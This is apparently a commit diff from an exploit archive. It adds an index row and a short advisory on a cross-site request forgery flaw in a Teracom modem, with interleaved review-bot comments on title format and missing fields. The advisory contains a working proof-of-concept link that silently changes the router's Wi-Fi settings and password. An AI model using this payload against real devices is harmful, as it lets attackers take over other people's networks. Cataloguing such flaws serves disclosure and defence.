Updated 04_21_2014
parent
0181f4682f
commit
60422ba127
2 changed files with 13 additions and 0 deletions
|
@ -29691,3 +29691,4 @@ id,file,description,date,author,platform,type,port
|
|||
32940,platforms/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x HTTP Response Splitting Vulnerability",2009-04-21,"SCS team",java,webapps,0
|
||||
32941,platforms/php/webapps/32941.txt,"PTCeffect 4.6 - LFI & SQL Injection Vulnerabilities",2014-04-19,"walid naceri",php,webapps,0
|
||||
32942,platforms/linux/remote/32942.txt,"Mozilla Multiple Products Server Refresh Header XSS",2009-04-22,"Olli Pettay",linux,remote,0
|
||||
32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF Vulnerability",2014-04-20,"Rakesh S",hardware,webapps,0
|
||||
|
|
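Review bot: the description in the row for 32943 ("Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF Vulnerability") does not match the title recorded in the file it indexes ("# Exploit Title: Teracom Modem CSRF Vulnerability"), and the rows around it mix two title styles: 32941 and 32943 use "Product Version - Class", while 32940 and 32942 run the product and class together with no separator. Settle on one form for the description column and keep the index entry and the file header in agreement, so that a search on the model string T2-B-Gawv1.4U10Y-BI finds both. The date column is consistent (2014-04-20 here, 20-04-2014 in the file header), so nothing to change there.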
|
12
platforms/hardware/webapps/32943.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
# Exploit Title: Teracom Modem CSRF Vulnerability
|
||||
# Date: 20-04-2014
|
||||
# Author: Rakesh S
|
||||
# Software Link: http://www.teracom.in/
|
||||
# Version: T2-B-Gawv1.4U10Y-BI
|
||||
|
||||
The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
|
||||
|
||||
The exploitation example below changes password for the SSID:
|
||||
|
||||
|
||||
<a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>
|
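Review bot: the header block ending at "# Version: T2-B-Gawv1.4U10Y-BI" and the description paragraph give the cause ("insufficient validation of HTTP request origin") but record nothing a defender can act on: no vendor notification or fix status, no CVE or advisory reference, and no statement of which firmware builds were tested. Add those fields to the header, and note in the description that the sample request changes the wireless configuration through a plain GET link with no per-session token, since that is the condition an owner of this device needs to check for after a firmware update. Separately, the file is added with the executable bit set ("Executable file") although it is a 12-line text advisory; it should be committed as a regular non-executable file.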